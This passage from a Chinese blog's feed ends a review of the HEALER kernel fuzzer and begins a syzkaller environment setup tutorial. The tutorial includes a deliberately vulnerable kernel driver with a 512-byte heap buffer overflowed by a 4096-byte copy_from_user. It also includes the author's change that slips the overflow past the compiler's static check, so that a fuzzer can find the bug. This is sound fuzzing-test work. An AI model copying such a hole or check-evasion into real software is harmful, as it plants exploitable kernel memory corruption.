Learning。</p><p>该论文虽然特别的长，但实际上核心思想较为简单，只分为三部分，分别是</p><ul><li>Relation Learning 中的 <strong>Static Learning</strong> 和 <strong>Dynamic Learning</strong></li><li>以及 Healer 如何使用 Relation 来进行<strong>变异</strong>。</li></ul><h2 id="三、Relation-Learning">三、Relation Learning</h2><h3 id="1-定义">1. 定义</h3><p>Healer 使用 Relatino learning 来动态感知 syscall 之间的内部关系。其中这里有个定义：</p><blockquote><p>若某个 syscall $C_i$ 的执行可以影响到另一个 syscall $C_j$ 的<strong>执行路径</strong>（例如 $C_i$ 修改了<strong>内核的内部状态</strong>），则我们称 $C_i$ 对 $C_j$ <strong>产生了影响</strong>。</p></blockquote><p>Healer 使用<strong>二维表$R^{n \times n}$</strong> （Relation Table，关系表）来记录任意 n 个 syscall 中的内部关系：</p><ul><li>若 $R_{ij}$ 为1，则说明 syscall $C_i$ 可以对 $C_j$ 的执行路径产生影响。</li><li>反之，$R_{ij}$ 为0则说明不产生影响。</li></ul><blockquote><p>初始时，healer 没有记录下任何 syscall 之间的内部关系，因此该表格初始时全为 0。</p></blockquote><p>接下来，Relation Learning 分为两部分</p><ul><li>Static Learning：根据 syscall 描述的<strong>输入参数类型</strong>和<strong>返回类型</strong>来获取 Relation。</li><li>Dynamic Learning：用于找到 syscall 描述无法表达的 Relation。</li></ul><h3 id="2-Static-Learning">2. Static Learning</h3><p>初始时，Static Learning 将会根据 Syzlang 描述所提供的信息来初始化 Relation Table。其中，参数类型和返回值类型对静态分析至关重要。</p><p>当同时满足以下两个条件时，static learning 将认为 syscall $C_i$ 对 $C_j$ 产生影响，并设置 Relation Table 中的 $R_{ij} = 1$：</p><ol><li><p>$C_i$的返回值类型是<strong>一种 resource 类型</strong> $r_0$ ，或者$C_i$ 中的任何一个参数是一个<strong>具有向外数据流方向</strong>的指针。</p><blockquote><p>这一条其实相当好理解，主要是限制 $C_i$ 的作用是产生向外数据流。</p></blockquote></li><li><p>$C_j$ 中至少有一个参数的类型是 <strong>具有向内数据流的 resource 类型</strong> $r_0$或与 $r_0$相兼容的类型 $r_1$。  由于 syzlang 支持类型嵌套（或者类型兼容），因此类型 $r_1$ 也是符合要求的。</p></li></ol><p>这两个条件显示约束了数据流方向，必须从$C_i\to C_j$ ，这是静态学习中所能得知的 Relation。</p><p><strong>可以将静态学习理解成捕获两个系统调用之间的直接关系</strong>（例如数据流关系）。</p><h3 id="3-Dynamic-Learning">3. Dynamic Learning</h3><p>动态学习可以使用 syzlang 无法表达的信息来更好的更新和细化关系表，以便于生成更高质量的测试用例。</p><p>初始时， healer 会先单独收集 syscall 序列中的每个 syscall 的覆盖范围，并存储其触发的基本块和边的标识符序列，<strong>以便于在接下来的测试中发现新的覆盖范围信息</strong>。</p><p>之后，Dynamic Learning 将会使用 minimization 算法，获取到<strong>尽可能小且覆盖范围不变</strong>的系统调用序列。</p><blockquote><p>这一步操作是为了过滤掉那些对新覆盖范围无用的系统调用，并加强分析效果。</p><p>minimization 算法将<strong>反向遍历</strong>系统调用序列，提取出那些<strong>没有被包含在其他最小序列中</strong>（防止重复）且<strong>生成了新覆盖范围信息</strong>（有新覆盖才有用）的系统调用。</p></blockquote><p>该算法的核心思想较为简单，先上图：</p><p><img src="/2021/11/healer/image-20211129204151676.png" alt="image-20211129204151676"></p><p>简单概括一下，该算法的输入有两个，分别是</p><ol><li>系统调用序列 p（即测试样例）</li><li>序列 p 中每个 syscall 所生成的<strong>新</strong>覆盖范围（注意<strong>新</strong>字）</li></ol><p>之后，尝试从后向前依次遍历每个系统调用，</p><ul><li>若某个系统调用不产生<strong>新的</strong>覆盖范围，则直接丢弃（因为不产生新覆盖所以肯定没用）</li><li>若某个系统调用之前被丢弃过，则也一并丢弃</li><li>之后循环从后向前遍历系统调用序列，并多次尝试丢弃一些系统调用。若丢弃某个系统调用后，覆盖范围没有发生改变，则该系统调用是无用的，可以被丢弃，否则则必须保留。</li></ul><blockquote><p>这一步的操作只是为了删除不影响覆盖范围的系统调用。</p></blockquote><p>在完成 minimization 算法后，Dynamic Learning 将会在最小系统调用序列中，逐渐的移出单个 syscall 并检测每个移出操作对<strong>下一个 syscall</strong> 的影响，这是其具体算法描述：</p><p><img src="/2021/11/healer/image-20211129205500333.png" alt="image-20211129205500333"></p><p>其实也很简单，简单概括一下就是，</p><blockquote><p>在给定的最小系统调用序列中，依次遍历该序列中的所有 syscall。</p><p>设当前遍历到了系统调用 $C_j$，且 $C_i$ 是 $C_j$ 的<strong>前一个</strong>系统调用（previous）。</p><p>若将 $C_i$ 从系统调用序列中删除，且该删除将会影响到 $C_j$ 的覆盖范围信息，则说明 $C_i$ 对 $C_j$ 产生了影响，因此可以设置 $R_{ij} = 1$。</p></blockquote><p>这里有个关键点需要注意一下：对于系统调用序列 $[C_0, C_1, C_2]$ 来说，若 $C_1$ 的移除影响到 $C_2$ 的覆盖范围，则我们可以确定 $C_1 \to C_2$ 存在影响关系。但是，若 $C_0$ 的移除导致了 $C_2$ 的覆盖范围发生改变，则<strong>不能</strong>说明  $C_0 \to C_2$。这是因为，$C_0$ 的移出可能导致 $C_1$ 覆盖范围的变化，进而间接影响到 $C_2$ 覆盖范围的变化。</p><p>通过上述的两个算法，healer 成功通过覆盖范围信息来指导建立起系统调用之间的内部关系信息。</p><p><strong>可以将动态学习理解成捕获两个系统调用之间的间接关系</strong>（例如内核内部的状态改变关系）。</p><h2 id="四、变异与生成">四、变异与生成</h2><p>当 Relation Table 通过上面的算法逐步建成后，该信息将会被用于指导变异和生成。抛开那些常用的变异手法（例如随机插入 syscall 或者变异参数类型等方法），这里只讲一下 <strong>healer 如何利用 Relation table 来进行变异</strong>。</p><p>首先，Healer 对语料库现有的系统调用序列执行变异，在选择了某个变异目标后，healer 将</p><ol><li>随机在系统调用序列中选择一个插入点</li><li>将插入点前面的子序列用作输入，执行<strong>变异算法</strong>，将该算法选择的系统调用插入至该位置。</li></ol><p>变异算法具体描述如下：</p><p><img src="/2021/11/healer/image-20211129211440619.png" alt="image-20211129211440619"></p><p>通俗的说，就是</p><ul><li>如果概率小于 $1-\alpha$，则直接随机返回一个系统调用。</li><li>否则，遍历传入的子序列 S，并将子序列中每个 syscall 可能产生影响的新 syscall 加入候选队列中。如果之前已经加入过一次，则增加其权重。</li><li>最后随机通过权重来选择一个候选 syscall。</li></ul><p>需要注意的是，在 healer 初始启动时，Relation Table 中并没有太多的数据可以用于指导变异和生成，此时<strong>若过度使用信息不足的关系表则可能会降低测试用例的多样性</strong>；但另一方面，要是完全不使用 Relation Table，则测试用例的质量就不会太高（而且完全不使用的话，上面的工作就白做了）。</p><p><strong>因此实际上该变异算法中的 $\alpha$ 是用来平衡这两者的一个关键</strong>：若在使用学习到的 Relations 时覆盖率信息增加，则$\alpha$也将同步增加，进一步提高使用非随机变异策略的概率。</p><h2 id="五、评估">五、评估</h2><p>在24小时中的 fuzz 过程里，healer 可以获得比 syzkaller 更广的覆盖率：</p><p><img src="/2021/11/healer/image-20211130095845117.png" alt="image-20211130095845117"></p><p>需要注意的是，初始时 healer 和 syzkaller 的覆盖率曲线是重合的，这是因为此时 healer 还没有建立完备的 Relation Table，使用的仍然是随机变异。</p><p>下图显示的是建立 Relation 的全过程（图中的<strong>每个点</strong>表示<strong>不同的 syscall</strong>，<strong>有向边</strong>表示<strong>影响关系</strong>）：</p><p><img src="/2021/11/healer/image-20211130101056881.png" alt="image-20211130101056881"></p><p>初始时，Relation 是根据静态分析所得出的关系，因此此时在关系图中<strong>存在非常多的子图</strong>。</p><p>随着时间的推移，更多的隐式关系被找出，不同的子图开始慢慢相连。并到最后形成巨大的关系图。</p><p>除此之外，还发现了一些 syzkaller 没发现的新漏洞。</p><h2 id="六、局限性">六、局限性</h2><p>syzlang 描述本身在大多数情况下是人工编写生成的，人工成本较大，且描述的正确性和完整性也不能保证。</p><p>一个可能的解决方案是自动将 C 头文件中的定义转换为Syzlang描述，保存原始的结构定义。</p><h2 id="七、随笔">七、随笔</h2><p>这篇论文整体思路上并不复杂，但它确确实实能捕获到系统调用之间的关系，而且在各个思路与细节方法均考虑的十分周全，是一篇相当不错的论文。</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Healer 是受 Syzkaller 启发的 kernel fuzz。&lt;/p&gt;
&lt;p&gt;与 Syzkaller 类似，Healer 使用 &lt;a href=&quot;https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md&quot;&gt;Syzlang&lt;/a&gt; 描述所提供的 syscall 信息来生成确认参数结构约束和部分语义约束的系统调用序列，并通过不断执行生成的调用序列来发现内核错误，导致内核崩溃。&lt;/p&gt;
&lt;p&gt;与 Syzkaller 不同，Healer 不使用 choise table，而是通过动态移除&lt;strong&gt;最小化调用序列&lt;/strong&gt;中的调用并观察覆盖范围变化来检测&lt;strong&gt;不同系统调用之间的内部关系&lt;/strong&gt;，并利用内部关系来指导调用序列的生成和变异。此外，Healer 还使用了与 Syzkaller 不同的架构设计。&lt;/p&gt;
&lt;p&gt;论文地址：&lt;a href=&quot;http://www.wingtecher.com/themes/WingTecherResearch/assets/papers/healer-sosp21.pdf&quot;&gt;HEALER: Relation Learning Guided Kernel Fuzzing&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;项目地址：&lt;a href=&quot;https://github.com/SunHao-0/healer&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
  </entry>
  
  <entry>
    <title>syzkaller 环境搭建</title>
    <link href="https://kiprey.github.io/2021/11/syzkaller_1/"/>
    <id>https://kiprey.github.io/2021/11/syzkaller_1/</id>
    <published>2021-11-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.115Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Syzkaller 是一个无监督的覆盖引导的内核 fuzzer，是目前类似里程碑一样的 fuzz 。</p><p>项目地址 - <a href="https://github.com/google/syzkaller">syzkaller</a></p><p>本人对 syzkaller 的工作机制比较感兴趣，同时课题组也会经常用到 syzkaller，因此了解 syzkaller 是一个必不可少的过程。</p><p>在研究内核fuzz的工作机制之前，我们需要先学会如何搭建它的环境。</p><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>syzkaller 使用 Go 语言编写，因此需要获取 go 语言的 tool chain。不过我倒没怎么在这上面踩过坑，直接</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install golang <span class="comment"># 此时的 golang 是 1.15 版</span></span><br><span class="line">make all</span><br></pre></td></tr></table></figure><p>就完成了所有 syzkaller 程序的编译。</p></li><li><p>qemu 安装不多说</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install qemu-system-x86</span><br></pre></td></tr></table></figure></li><li><p>接下来是获取内核源码，要拉n久：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://mirrors.tuna.tsinghua.edu.cn/git/linux.git</span><br></pre></td></tr></table></figure><p>本人使用的 git commit id: a90af8f15bdc9449ee2d24e1d73fa3f7e8633f81</p><p>参考一下 <a href="https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md">syzkaller 官方文档</a>，先 <code>make defconfig</code> 生成默认的内核编译配置，之后手动在 <code>.config</code> 文件中添加以下选项：</p><blockquote><p>添加这些选项的目的是为了更好的被测试。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Coverage collection.</span></span><br><span class="line">CONFIG_KCOV=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Debug info for symbolization.</span></span><br><span class="line">CONFIG_DEBUG_INFO=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Memory bug detector</span></span><br><span class="line">CONFIG_KASAN=y</span><br><span class="line">CONFIG_KASAN_INLINE=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Required for Debian Stretch</span></span><br><span class="line">CONFIG_CONFIGFS_FS=y</span><br><span class="line">CONFIG_SECURITYFS=y</span><br></pre></td></tr></table></figure><p>之后重新 <code>make olddefconfig</code> 更新编译参数，并执行以下命令以编译<strong>完整</strong>内核（包括驱动）：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make -j `<span class="built_in">nproc</span>`</span><br></pre></td></tr></table></figure></li><li><p>配置<strong>Imgage 镜像</strong></p><p>首先安装 debootstrap，它是 linux 下用来构建一套<strong>基本根文件系统</strong>的工具。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install debootstrap</span><br></pre></td></tr></table></figure><p>之后在 linux 项目目录下键入以下命令，以创建 <strong>Debian Stretch Linux image</strong>：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> image</span><br><span class="line"><span class="built_in">cd</span> image/</span><br><span class="line">wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh</span><br><span class="line"><span class="built_in">chmod</span> +x create-image.sh</span><br><span class="line">./create-image.sh</span><br></pre></td></tr></table></figure><p>创建好后，同级目录下会多出几个文件：</p><p><img src="/2021/11/syzkaller_1/image-20211121114611675.png" alt="image-20211121114611675"></p></li><li><p>上述操作全部完成后，执行以下命令来尝试启动</p><blockquote><p>注意自行替换 kernel 和drive file 的路径。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">  -m 2G \</span><br><span class="line">  -smp 2 \</span><br><span class="line">  -kernel /usr/class/linux/arch/x86/boot/bzImage \</span><br><span class="line">  -append <span class="string">&quot;console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0&quot;</span> \</span><br><span class="line">  -drive file=/usr/class/linux/image/stretch.img,format=raw \</span><br><span class="line">  -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \</span><br><span class="line">  -net nic,model=e1000 \</span><br><span class="line">  -enable-kvm \</span><br><span class="line">  -nographic \</span><br><span class="line">  -pidfile vm.pid \</span><br><span class="line">  2&gt;&amp;1 | <span class="built_in">tee</span> vm.log</span><br></pre></td></tr></table></figure><p>如果成功的话，就会出现 syzkaller login。用户名键入<code>root</code>，无需输入密码，即可进入终端：</p><p><img src="/2021/11/syzkaller_1/image-20211121115312828.png" alt="image-20211121115312828"></p><p>之后我们还可以再另外一个终端里键入以下命令以进入 ssh</p><blockquote><p>之所以还要测试 ssh 能否成功工作，是因为 syzkaller 会用到 ssh。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i <span class="variable">$IMAGE</span>/stretch.id_rsa -p 10021 -o <span class="string">&quot;StrictHostKeyChecking no&quot;</span> root@localhost</span><br></pre></td></tr></table></figure><p><img src="/2021/11/syzkaller_1/image-20211121115439899.png" alt="image-20211121115439899"></p><p>确认无误后，直接执行 <code>poweroff</code> 关闭 kernel。</p></li><li><p>尝试执行 <code>syzkaller-manager</code></p><p>先新建一个<code>my.cfg</code>，这个文件将是 syzkaller 的配置文件，内容如下：</p><blockquote><p>务必自行替换里面的各种路径。</p></blockquote><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="string">&quot;linux/amd64&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;http&quot;</span><span class="punctuation">:</span> <span class="string">&quot;127.0.0.1:56741&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;workdir&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller/workdir&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;kernel_obj&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;image&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux/image/stretch.img&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;sshkey&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux/image/stretch.id_rsa&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;syzkaller&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;procs&quot;</span><span class="punctuation">:</span> <span class="number">8</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;qemu&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;vm&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;count&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;kernel&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux/arch/x86/boot/bzImage&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;cpu&quot;</span><span class="punctuation">:</span> <span class="number">2</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;mem&quot;</span><span class="punctuation">:</span> <span class="number">2048</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>之后开跑看看：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> syzkaller</span><br><span class="line"><span class="built_in">mkdir</span> workdir</span><br><span class="line">./bin/syz-manager -config=my.cfg</span><br></pre></td></tr></table></figure><p>貌似跑的相当顺利：</p><p><img src="/2021/11/syzkaller_1/image-20211121120608962.png" alt="image-20211121120608962"></p><p>syzkaller Web端 也工作正常：</p><p><img src="/2021/11/syzkaller_1/image-20211121120652065.png" alt="image-20211121120652065"></p><blockquote><p>很好，环境这边没咋踩坑（笑）</p></blockquote></li></ul><h2 id="三、crash-测试">三、crash 测试</h2><p>俗话说，是骡子是马拉出来溜溜，我们将一个带有漏洞的驱动编入 kernel，之后尝试让 syzkaller fuzz出来。</p><blockquote><p>这里主要参考链接 github 中的 syzkaller crash demo 演示。</p></blockquote><h3 id="1-将漏洞驱动编译进-kernel">1. 将漏洞驱动编译进 kernel</h3><p>这里，我们使用的是其他人已经准备好的漏洞驱动 <a href="https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/blob/master/docs/harbian_qa/fuzz_testing/test.c">test.c</a> 。</p><p>简单讲讲这个漏洞驱动：</p><ul><li><p>初始加载驱动时，会在 <code>/proc</code> 文件夹下创建文件 <code>proc</code>。而针对于该 proc 的读写操作，内核实际会调用 <code>proc_*</code> 系列函数来进行处理。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MY_DEV_NAME <span class="string">&quot;test&quot;</span></span></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> a = &#123;</span><br><span class="line">                                .open = proc_open,</span><br><span class="line">                                .read = proc_read,</span><br><span class="line">                                .write = proc_write,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> __init <span class="title">mod_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_dir_entry</span> *test_entry;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> *proc_fops = &amp;a;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init start!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 创建 proc</span></span><br><span class="line">    test_entry = <span class="built_in">proc_create</span>(MY_DEV_NAME, S_IRUGO|S_IWUGO, <span class="literal">NULL</span>, proc_fops);</span><br><span class="line">    <span class="keyword">if</span>(!test_entry)</span><br><span class="line">       <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:there is somethings wrong!\n&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init over!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>驱动中的漏洞代码部分如下所示，可以看到当我们针对 <code>proc</code> 文件进行写入操作时，会造成内核堆溢出：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">char</span> *c = <span class="built_in">kmalloc</span>(<span class="number">512</span>, GFP_KERNEL);</span><br><span class="line">    <span class="comment">// 溢出，原先只有 512 字节，但是复制了 4096</span></span><br><span class="line">    <span class="built_in">copy_from_user</span>(c, proc_user, <span class="number">4096</span>);</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:into write!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>尝试将其加载进内核。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载源代码至 linux/drivers/char/test.c</span></span><br><span class="line">proxychains wget -v https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/raw/master/docs/harbian_qa/fuzz_testing/test.c -O linux/drivers/char/test.c</span><br><span class="line"><span class="comment"># 修改 Makefile </span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;obj-y += test.o&quot;</span> &gt;&gt; linux/drivers/char/Makefile</span><br><span class="line"><span class="comment"># 尝试编译</span></span><br><span class="line">make</span><br></pre></td></tr></table></figure><p>报错，提示：</p><p><img src="/2021/11/syzkaller_1/image-20211121142921325.png" alt="image-20211121142921325"></p><p>这里主要有两个地方出问题：</p><ul><li><p>原先代码中使用的 <code>struct file_operations</code> 需要替换成 <code>struct proc_ops</code></p></li><li><p>linux kernel 编译时会进行静态编译检测，这类通过静态推断便能得出的溢出问题将不予编译：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *c = <span class="built_in">kmalloc</span>(<span class="number">512</span>, GFP_KERNEL);</span><br><span class="line"><span class="built_in">copy_from_user</span>(c, proc_user, <span class="number">4096</span>);</span><br></pre></td></tr></table></figure><p>绕过静态检测也很简单，引入一个可变量即可。</p></li></ul><p>因此我简单修改了一下这个驱动文件，修改后如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/proc_fs.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/uaccess.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/slab.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MY_DEV_NAME <span class="string">&quot;test&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEBUG_FLAG <span class="string">&quot;PROC_DEV&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_read</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span> <span class="title">proc_write</span> <span class="params">(<span class="keyword">struct</span> file *proc_file, <span class="type">const</span> <span class="type">char</span> __user *proc_user, <span class="type">size_t</span> n, <span class="type">loff_t</span> *loff)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">proc_open</span> <span class="params">(<span class="keyword">struct</span> inode *proc_inode, <span class="keyword">struct</span> file *proc_file)</span></span>;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_ops</span> a = &#123;</span><br><span class="line">                                .proc_open = proc_open,</span><br><span class="line">                                .proc_read = proc_read,</span><br><span class="line">                                .proc_write = proc_write,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> __init <span class="title">mod_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_dir_entry</span> *test_entry;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">proc_ops</span> *proc_fops = &amp;a;</span><br><span class="line">    <span class="built_in">printk</span>(DEBUG_FLAG<span class="string">&quot;:proc init start!\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    test_entry = <span class="built_in">proc_create</span>(MY_DEV_NAME, 